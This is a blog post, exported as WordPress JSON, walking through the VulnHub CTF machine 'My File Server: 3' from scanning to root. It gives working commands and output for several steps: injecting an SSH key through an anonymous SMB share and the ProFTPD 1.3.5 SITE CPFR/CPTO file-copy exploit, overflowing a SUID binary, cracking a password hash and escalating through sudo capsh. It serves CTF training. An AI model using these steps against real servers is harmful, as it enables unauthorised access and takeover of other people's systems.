{"id":25860,"date":"2020-04-06T11:06:39","date_gmt":"2020-04-06T05:36:39","guid":{"rendered":"https:\/\/www.armourinfosec.com\/?p=25860"},"modified":"2020-04-07T21:51:20","modified_gmt":"2020-04-07T16:21:20","slug":"my-file-server-3-walkthrough","status":"publish","type":"post","link":"https:\/\/www.armourinfosec.com\/my-file-server-3-walkthrough\/","title":{"rendered":"My File Server: 3 Walkthrough"},"content":{"rendered":"

I will share with you a new Walkthrough for Infosec Warriors CTF<\/strong><\/a> machines. My File Server: 3 Walkthrough<\/strong> for the CTF machine is created by Vishal Biswas AKA Cyberknight. You can download here this CTF<\/a>. It states the level is Intermediate level and that is true. Either way, you explore a little if this is unfamiliar and that’s how you learn.<\/p>\n

\"My<\/p>\n

Penetration Testing Methodologies<\/h2>\n

Network Scan<\/h4>\n
    \n
  • \u00a0Netdicover<\/li>\n
  • \u00a0Nmap Enumeration<\/li>\n<\/ul>\n

    Enumeration<\/h4>\n
      \n
    • \u00a0Nikto<\/li>\n
    • Nmap Scripts<\/li>\n
    • \u00a0Injecting authorized_keys via smb<\/li>\n
    • \u00a0ProFTPd 1.3.5\u00a0 File Copy<\/li>\n<\/ul>\n

      Privilege Escalation<\/h4>\n
        \n
      • Buffer overflow<\/li>\n
      • Capture the Flag.<\/li>\n
      • password<\/li>\n
      • sudo<\/li>\n<\/ul>\n

        Network Scanning<\/h3>\n

        So, as we always start with netdiscover<\/strong> to get the IP of the VM machine and the IP of the host found is 192.168.2.11<\/p>\n

        #netdiscover -i vboxnet0\r\n\r\n Currently scanning: 192.168.60.0\/16 | Screen View: Unique Hosts\r\n\r\n 2 Captured ARP Req\/Rep packets, from 2 hosts. Total size: 102\r\n _____________________________________________________________________________\r\n IP At         MAC Address       Count  Len MAC Vendor \/ Hostname\r\n -----------------------------------------------------------------------------\r\n 192.168.2.2   08:00:27:25:0f:48  1      42 PCS Systemtechnik GmbH\r\n 192.168.2.11  08:00:27:a8:98:39  1      60 PCS Systemtechnik GmbH\r\n<\/pre>\n
        Let’s proceed with a network scan using Nmap aggressive scan as given below.<\/p>\n
        #nmap -p- -A -sC -O 192.168.2.11\r\n\r\n Nmap scan report for 192.168.2.11\r\n Not shown: 65523 closed ports\r\n PORT STATE SERVICE VERSION\r\n 21\/tcp open ftp vsftpd 3.0.2\r\n | ftp-anon: Anonymous FTP login allowed (FTP code 230)\r\n |_drwxrwxrwx 3 0 0 16 Feb 19 07:48 pub [NSE: writeable]\r\n | ftp-syst:\r\n | vsFTPd 3.0.2 - secure, fast, stable\r\n 22\/tcp open ssh OpenSSH 7.4 (protocol 2.0)\r\n | ssh-hostkey:\r\n | 2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)\r\n 80\/tcp open http Apache httpd 2.4.6 ((CentOS))\r\n | http-methods:\r\n |_http-server-header: Apache\/2.4.6 (CentOS)\r\n |_http-title: My File Server\r\n 139\/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)\r\n 445\/tcp open netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)\r\n 1337\/tcp open waste?\r\n | fingerprint-strings:\r\n | GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SIPOptions, TerminalServerCookie:\r\n |_ Why are you here ?!\r\n 2049\/tcp open nfs_acl 3 (RPC #100227)\r\n 2121\/tcp open ftp ProFTPD 1.3.5\r\n | ftp-anon: Anonymous FTP login allowed (FTP code 230)\r\n |_drwxrwxrwx 3 root root 16 Feb 19 07:48 pub [NSE: writeable]\r\n 20048\/tcp open mountd 1-3 (RPC #100005)\r\n 35756\/tcp open nlockmgr 1-4 (RPC #100021)\r\n 35992\/tcp open status 1 (RPC #100024)\r\n 1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\r\n Device type: general purpose\r\n Running: Linux 3.X\r\n OS CPE: cpe:\/o:linux:linux_kernel:3\r\n OS details: Linux 3.4 - 3.10\r\n Network Distance: 1 hop\r\n Service Info: Host: FILESERVER; OS: Unix\r\n OS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .<\/pre>\n
        Enumeration<\/h3>\n
        It was very interesting. I noticed many ports were open and have Anonymous Login enabled.\u00a0<\/strong>So I decided to enumerate more with Nmap scripts. Along with port number 80.<\/p>\n
        #nmap -p 139,445 --script=smb-enum* 192.168.2.11\r\n\r\n Nmap scan report for 192.168.2.11\r\n PORT STATE SERVICE\r\n 139\/tcp open netbios-ssn\r\n 445\/tcp open microsoft-ds\r\n MAC Address: 08:00:27:A8:98:39 (Oracle VirtualBox virtual NIC)\r\n Host script results:\r\n | smb-enum-shares:\r\n | account_used: <blank>\r\n | \\\\192.168.2.11\\IPC$:\r\n | Type: STYPE_IPC_HIDDEN\r\n | Comment: IPC Service (Samba 4.9.1)\r\n | Max Users: <unlimited>\r\n | Path: C:\\tmp\r\n | Anonymous access: READ\/WRITE\r\n | \\\\192.168.2.11\\print$:\r\n | Type: STYPE_DISKTREE\r\n | Comment: Printer Drivers\r\n | Users: 0\r\n | Max Users: <unlimited>\r\n | Path: C:\\var\\lib\\samba\\drivers\r\n | Anonymous access: <none>\r\n | \\\\192.168.2.11\\smbdata:\r\n | Type: STYPE_DISKTREE\r\n | Comment: smbdata\r\n | Users: 0\r\n | Max Users: <unlimited>\r\n | Path: C:\\smbdata\r\n | Anonymous access: READ\/WRITE\r\n | \\\\192.168.2.11\\smbuser:\r\n | Type: STYPE_DISKTREE\r\n | Comment: smbuser\r\n | Users: 0\r\n | Max Users: <unlimited>\r\n | Path: C:\\home\\smbuser\\\r\n |_ Anonymous access: <none>\r\n Nmap done: 1 IP address (1 host up) scanned in 300.66 seconds<\/pre>\n
        We know that there might be a “smbuser” on the network.<\/p>\n
        \"My<\/p>\n
        I choose to run Nikto for HTTP weak config listing, and found an entry for .ssh<\/strong><\/p>\n
        #nikto -h http:\/\/192.168.2.11\r\n\r\n- Nikto v2.1.6\r\n---------------------------------------------------------------------------\r\n+ Target IP: 192.168.2.11\r\n+ Target Hostname: 192.168.2.11\r\n+ Target Port: 80\r\n+ Start Time: 2020-04-06 01:01:31 (GMT5.5)\r\n---------------------------------------------------------------------------\r\n+ Server: Apache\/2.4.6 (CentOS)\r\n+ The anti-clickjacking X-Frame-Options header is not present.\r\n+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS\r\n+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site differently to the MIME type\r\n+ Apache\/2.4.6 appears to be outdated (current is at least Apache\/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.\r\n+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD, TRACE\r\n+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST\r\n+ OSVDB-3093: \/.ssh\/authorized_keys: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\r\n+ OSVDB-3268: \/icons\/: Directory indexing found.\r\n+ OSVDB-3233: \/icons\/README: Apache default file found.<\/pre>\n
        When I tested “.ssh” on web browser….. I got ssh folder, containing id_rsa and authorized_keys.<\/p>\n
        \"My<\/p>\n
        When I opened authorized_keys. Its confirm that “smbuser” is present in host machine or network.<\/p>\n
        \"My<\/p>\n
         <\/p>\n
        I download file authorized_keys in my local Linux<\/p>\n
        #wget http:\/\/192.168.2.11\/.ssh\/authorized_keys\r\n\r\n --2020-04-06 01:05:15--  http:\/\/192.168.2.11\/.ssh\/authorized_keys\r\n Connecting to 192.168.2.11:80... connected.\r\n HTTP request sent, awaiting response... 200 OK\r\n Length: 410\r\n Saving to: \u2018authorized_keys\u2019 \r\n authorized_keys         100%[==============================>]     410  --.-KB\/s    in 0s      \r\n 2020-04-06 01:05:15 (39.3 MB\/s) - \u2018authorized_keys\u2019 saved [410\/410]<\/pre>\n
        We know that “smbdata” has\u00a0read and write<\/strong> permission. So if we place the authorized_keys of our Linux and………………<\/p>\n
        #smbclient \/\/192.168.2.11\/smbdata\r\n\r\n Enter WORKGROUP\\root's password: \r\n Anonymous login successful\r\n Try \"help\" to get a list of possible commands.\r\n smb: \\> ls\r\n  .                                   D        0  Mon Apr  6 00:56:56 2020\r\n  ..                                  D        0  Tue Feb 18 17:17:54 2020\r\n  anaconda                            D        0  Tue Feb 18 17:18:15 2020\r\n  audit                               D        0  Tue Feb 18 17:18:15 2020\r\n  boot.log                            N     6120  Tue Feb 18 17:18:16 2020\r\n  btmp                                N      384  Tue Feb 18 17:18:16 2020\r\n  cron                                N     4813  Tue Feb 18 17:18:16 2020\r\n  dmesg                               N    31389  Tue Feb 18 17:18:16 2020\r\n  dmesg.old                           N    31389  Tue Feb 18 17:18:16 2020\r\n  glusterfs                           D        0  Tue Feb 18 17:18:16 2020\r\n  lastlog                             N   292292  Tue Feb 18 17:18:16 2020\r\n  maillog                             N     1982  Tue Feb 18 17:18:16 2020\r\n  messages                            N   684379  Tue Feb 18 17:18:17 2020\r\n  ppp                                 D        0  Tue Feb 18 17:18:17 2020\r\n  samba                               D        0  Tue Feb 18 17:18:17 2020\r\n  secure                              N    11937  Tue Feb 18 17:18:17 2020\r\n  spooler                             N        0  Tue Feb 18 17:18:17 2020\r\n  tallylog                            N        0  Tue Feb 18 17:18:17 2020\r\n  tuned                               D        0  Tue Feb 18 17:18:17 2020\r\n  wtmp                                N    25728  Tue Feb 18 17:18:17 2020\r\n  xferlog                             N      100  Tue Feb 18 17:18:17 2020\r\n  yum.log                             N    10915  Tue Feb 18 17:18:17 2020\r\n  sshd_config                         N     3906  Wed Feb 19 13:16:38 2020\r\n  todo                                N      162  Tue Feb 25 19:52:29 2020\r\n  id_rsa                              N     1766  Thu Mar 19 10:13:16 2020\r\n  note.txt                            N      128  Thu Mar 19 10:23:12 2020\r\n\r\n\t\t19976192 blocks of size 1024. 18257932 blocks available\r\nsmb: \\> exit\r\n\r\n#cd .ssh\/\r\n#ls\r\n authorized_keys  id_rsa  id_rsa.pub  known_hosts\r\n#smbclient \/\/192.168.2.11\/smbdata\r\n Enter WORKGROUP\\root's password: \r\n Anonymous login successful\r\n Try \"help\" to get a list of possible commands.\r\n smb: \\> put authorized_keys \r\n putting file authorized_keys as \\authorized_keys (61.7 kb\/s) (average 61.7 kb\/s)\r\n smb: \\> \r\n<\/pre>\n
        It is successfully done. We know that port 2121 ProFTPD 1.3.5 has “file copy” vulnerability. So I log in in FTP 2121 without username and password. Then I copy authorized_keys from \/<\/strong>smbdata<\/strong> to \/home\/smbuser\/.ssh\/authorized_keys<\/strong><\/p>\n
        #telnet 192.168.2.11 2121\r\n\r\n Trying 192.168.2.11...\r\n Connected to 192.168.2.11.\r\n Escape character is '^]'.\r\n  220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.2.11]\r\n site help\r\n  214-The following SITE commands are recognized (* =>'s unimplemented)\r\n  CPFR <sp> pathname\r\n  CPTO <sp> pathname\r\n  HELP\r\n  CHGRP\r\n  CHMOD\r\n  214 Direct comments to root@localhost\r\n site cpfr \/smbdata\/authorized_keys\r\n  350 File or directory exists, ready for destination name\r\n site cpto \/home\/smbuser\/.ssh\/authorized_keys\r\n 250 Copy successful<\/pre>\n
        Now I tried to take ssh from id_rsa file and yehhhhh we got a smbuser<\/strong> shell…<\/p>\n
        #ssh smbuser@192.168.2.11 -i id_rsa \r\n\r\n   ##############################################################################################\r\n   #\t\t\t\t\t  InfoSec Warrior                                       #             \r\n   #                         --------- www.InfoSecWarrior.com ------------                      #\r\n   #                                    My File Server - 3\t\t\t\t\t#                    \r\n   #  \t\t\t    Just a simple addition to the problem                               #\r\n   #                               Designed By :- CyberKnight                                   #\r\n   #                                Twitter    :- @CyberKnight00                                #\r\n   ##############################################################################################\r\n\r\n Last login: Mon Apr  6 01:39:47 2020 from 192.168.2.1\r\n [smbuser@fileserver ~]$ id \r\n  uid=1000(smbuser) gid=1000(smbuser) groups=1000(smbuser)\r\n [smbuser@fileserver ~]$ hostname \r\n  fileserver<\/pre>\n
        Here we got two folders at home but I didn’t get anything and we have no find and locate command for searching suid files. So I have manually searched and I got a file “esclate”\u00a0<\/strong> which has suid bit of user bla.<\/p>\n
        [smbuser@fileserver ~]$  find \r\n -bash: find: command not found\r\n[smbuser@fileserver ~]$ ls -lha \/usr\/bin |grep esclate\r\n -rwsr-xr-x    1 bla  bla     7.4K Feb 27 00:21 esclate<\/pre>\n
        so from this file, we can try to take “bla<\/strong> ” user shell. After feeding a lot of numbers and alphabets .. sometimes it gives “why are you here?” and sometimes “Segmentation fault” …<\/p>\n
        So I understood what’s happening here. I gave a value {number} which comes in between both the errors. and yeah “I got the bla user group”<\/p>\n
        [smbuser@fileserver ~]$ \/usr\/bin\/esclate \r\n 123456789012345678901234567{27}\r\n Why are you here ?!\r\n[smbuser@fileserver ~]$ \/usr\/bin\/esclate\r\n 123456789012345687901234567890123456{36}\r\n Segmentation fault\r\n[smbuser@fileserver ~]$ \/usr\/bin\/esclate          \r\n 1234567890123456789012345678901{32}\r\n Why are you here ?!\r\n[smbuser@fileserver ~]$ \/usr\/bin\/esclate     \r\n 1234567890123456789012345678901234{34}  \r\nsh-4.2$ id\r\n uid=1001(bla) gid=1000(smbuser) groups=1001(bla),1000(smbuser)\r\nsh-4.2$ hostname \r\n fileserver\r\nsh-4.2$ uname -a\r\n Linux fileserver 3.10.0-229.el7.x86_64 #1 SMP Fri Mar 6 11:36:42 UTC 2015 x86_64 x86_64 x86_64 GNU\/Linux\r\nsh-4.2$ \r\n<\/pre>\n
        Then I tried to go access bla directory and yeh I was finally in.<\/p>\n
        and got FLAG of bla user.<\/p>\n
        sh-4.2$ cd home\r\nsh-4.2$ ls \r\n bla  smbuser\r\nsh-4.2$ cd bla\r\nsh-4.2$ ls -lha\r\n total 40K\r\n drwx------  2 bla  bla  121 Feb 27 00:29 .\r\n drwxr-xr-x. 4 root root  30 Feb 25 16:21 ..\r\n lrwxrwxrwx  1 bla  bla    9 Feb 25 19:57 .bash_history -> \/dev\/null\r\n -rw-r--r--  1 bla  bla   18 Mar  6  2015 .bash_logout\r\n -rw-r--r--  1 bla  bla  193 Mar  6  2015 .bash_profile\r\n -rw-r--r--  1 bla  bla  231 Mar  6  2015 .bashrc\r\n -rw-rw-r--  1 bla  bla  516 Feb 27 00:29 user.txt\r\n -rw-------  1 bla  bla  731 Feb 26 23:36 .viminfo\r\n -rwxr-xr-x  1 root root 19K Feb 25 16:22 ynetd\r\nsh-4.2$ cat user.txt\r\n   _____ _ _      ____                                     _____ \r\n  |  ___(_) | ___\/ ___|  ___ _ ____   _____ _ __          |___ \/ \r\n  | |_  | | |\/ _ \\___ \\ \/ _ \\ '__\\ \\ \/ \/ _ \\ '__|  _____    |_ \\ \r\n  |  _| | | |  __\/___) |  __\/ |   \\ V \/  __\/ |    |_____|  ___) |\r\n  |_|   |_|_|\\___|____\/ \\___|_|    \\_\/ \\___|_|            |____\/                                                           \r\n Flag : 0aab4a2c6d75db7ca2542e0dacc3a30f\r\n you can crack this hash, because it is also my pasword\r\n note: crack it, itiseasy<\/pre>\n
        so after cracking the hash, I got bla user password bla:itiseasy.\u00a0<\/strong>After that, I checked sudo permissions and writes. and I got the two things which can run by Sudo “capsh” and “setcap”.<\/p>\n
        and I got the root shell…..<\/p>\n
        sh-4.2$ sudo -l\r\n Matching Defaults entries for bla on this host:\r\n     requiretty, !visiblepw, always_set_home, env_reset, env_keep=\"COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS\", env_keep+=\"MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE\",\r\n     env_keep+=\"LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES\", env_keep+=\"LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE\", env_keep+=\"LC_TIME LC_ALL LANGUAGE LINGUAS\r\n     _XKB_CHARSET XAUTHORITY\", secure_path=\/sbin\\:\/bin\\:\/usr\/sbin\\:\/usr\/bin\r\n User bla may run the following commands on this host:\r\n     (ALL) NOPASSWD: \/usr\/sbin\/capsh, (ALL) \/usr\/sbin\/setcap\r\n\r\nsh-4.2$ sudo -u root \/usr\/sbin\/capsh --\r\n[root@fileserver bla]# id\r\n uid=0(root) gid=0(root) groups=0(root)\r\n[root@fileserver bla]# cd \/root\/\r\n[root@fileserver ~]# ls \r\n proof.txt\r\n[root@fileserver ~]# cat proof.txt \r\n     _______ __    _____                                       _____\r\n    \/ ____(_) \/__ \/ ___\/___  ______   _____  _____            |__  \/\r\n   \/ \/_  \/ \/ \/ _ \\\\__ \\\/ _ \\\/ ___\/ | \/ \/ _ \\\/ ___\/  ______     \/_ < \r\n  \/ __\/ \/ \/ \/  __\/__\/ \/  __\/ \/   | |\/ \/  __\/ \/     \/_____\/   ___\/ \/ \r\n \/_\/   \/_\/_\/\\___\/____\/\\___\/_\/    |___\/\\___\/_\/               \/____\/  \r\n                                                                \r\n flag : 7be300997079eaebcdf9975ede6746e9\r\n[root@fileserver ~]# id\r\n uid=0(root) gid=0(root) groups=0(root)\r\n[root@fileserver ~]# hostname\r\n fileserver\r\n[root@fileserver ~]# \r\n\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
        I will share with you a new Walkthrough for Infosec Warriors CTF machines. My File Server: 3 Walkthrough for the…<\/p>\n","protected":false},"author":1,"featured_media":25882,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[107],"tags":[119,120,118],"yoast_head":"\nMy File Server: 3 Walkthrough - Armour Infosec<\/title>\n<meta name=\"description\" content=\"Another walkthrough for the vulnhub machine \u201cMy File Server: 3\u201d which is an easy lab designed by the author to give a taste to the OSCP Labs.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.armourinfosec.com\/my-file-server-3-walkthrough\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"My File Server: 3 Walkthrough - Armour Infosec\" \/>\n<meta property=\"og:description\" content=\"Another walkthrough for the vulnhub machine \u201cMy File Server: 3\u201d which is an easy lab designed by the author to give a taste to the OSCP Labs.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.armourinfosec.com\/my-file-server-3-walkthrough\/\" \/>\n<meta property=\"og:site_name\" content=\"Armour Infosec\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/ArmourInfosec\" \/>\n<meta property=\"article:published_time\" content=\"2020-04-06T05:36:39+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-04-07T16:21:20+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-06-00-41-05-e1586276183517.png\" \/>\n\t<meta property=\"og:image:width\" content=\"800\" \/>\n\t<meta property=\"og:image:height\" content=\"302\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Armour Infosec\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@ArmourInfosec\" \/>\n<meta name=\"twitter:site\" content=\"@ArmourInfosec\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Armour Infosec\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.armourinfosec.com\/my-file-server-3-walkthrough\/\",\"url\":\"https:\/\/www.armourinfosec.com\/my-file-server-3-walkthrough\/\",\"name\":\"My File Server: 3 Walkthrough - Armour Infosec\",\"isPartOf\":{\"@id\":\"https:\/\/www.armourinfosec.com\/#website\"},\"datePublished\":\"2020-04-06T05:36:39+00:00\",\"dateModified\":\"2020-04-07T16:21:20+00:00\",\"author\":{\"@id\":\"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308\"},\"description\":\"Another walkthrough for the vulnhub machine \u201cMy File Server: 3\u201d which is an easy lab designed by the author to give a taste to the OSCP Labs.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.armourinfosec.com\/my-file-server-3-walkthrough\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.armourinfosec.com\/my-file-server-3-walkthrough\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.armourinfosec.com\/my-file-server-3-walkthrough\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.armourinfosec.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"My File Server: 3 Walkthrough\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.armourinfosec.com\/#website\",\"url\":\"https:\/\/www.armourinfosec.com\/\",\"name\":\"Armour Infosec\",\"description\":\"Do Your Part - Be Security Smart\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.armourinfosec.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308\",\"name\":\"Armour Infosec\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.armourinfosec.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g\",\"caption\":\"Armour Infosec\"},\"sameAs\":[\"https:\/\/www.armourinfosec.com\/\"],\"url\":\"https:\/\/www.armourinfosec.com\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"My File Server: 3 Walkthrough - Armour Infosec","description":"Another walkthrough for the vulnhub machine \u201cMy File Server: 3\u201d which is an easy lab designed by the author to give a taste to the OSCP Labs.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.armourinfosec.com\/my-file-server-3-walkthrough\/","og_locale":"en_US","og_type":"article","og_title":"My File Server: 3 Walkthrough - Armour Infosec","og_description":"Another walkthrough for the vulnhub machine \u201cMy File Server: 3\u201d which is an easy lab designed by the author to give a taste to the OSCP Labs.","og_url":"https:\/\/www.armourinfosec.com\/my-file-server-3-walkthrough\/","og_site_name":"Armour Infosec","article_publisher":"https:\/\/www.facebook.com\/ArmourInfosec","article_published_time":"2020-04-06T05:36:39+00:00","article_modified_time":"2020-04-07T16:21:20+00:00","og_image":[{"width":800,"height":302,"url":"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-06-00-41-05-e1586276183517.png","type":"image\/png"}],"author":"Armour Infosec","twitter_card":"summary_large_image","twitter_creator":"@ArmourInfosec","twitter_site":"@ArmourInfosec","twitter_misc":{"Written by":"Armour Infosec","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.armourinfosec.com\/my-file-server-3-walkthrough\/","url":"https:\/\/www.armourinfosec.com\/my-file-server-3-walkthrough\/","name":"My File Server: 3 Walkthrough - Armour Infosec","isPartOf":{"@id":"https:\/\/www.armourinfosec.com\/#website"},"datePublished":"2020-04-06T05:36:39+00:00","dateModified":"2020-04-07T16:21:20+00:00","author":{"@id":"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308"},"description":"Another walkthrough for the vulnhub machine \u201cMy File Server: 3\u201d which is an easy lab designed by the author to give a taste to the OSCP Labs.","breadcrumb":{"@id":"https:\/\/www.armourinfosec.com\/my-file-server-3-walkthrough\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.armourinfosec.com\/my-file-server-3-walkthrough\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.armourinfosec.com\/my-file-server-3-walkthrough\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.armourinfosec.com\/"},{"@type":"ListItem","position":2,"name":"My File Server: 3 Walkthrough"}]},{"@type":"WebSite","@id":"https:\/\/www.armourinfosec.com\/#website","url":"https:\/\/www.armourinfosec.com\/","name":"Armour Infosec","description":"Do Your Part - Be Security Smart","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.armourinfosec.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308","name":"Armour Infosec","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.armourinfosec.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g","caption":"Armour Infosec"},"sameAs":["https:\/\/www.armourinfosec.com\/"],"url":"https:\/\/www.armourinfosec.com\/author\/admin\/"}]}},"menu_order":0,"_links":{"self":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/posts\/25860"}],"collection":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/comments?post=25860"}],"version-history":[{"count":0,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/posts\/25860\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/media\/25882"}],"wp:attachment":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/media?parent=25860"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/categories?post=25860"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/tags?post=25860"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}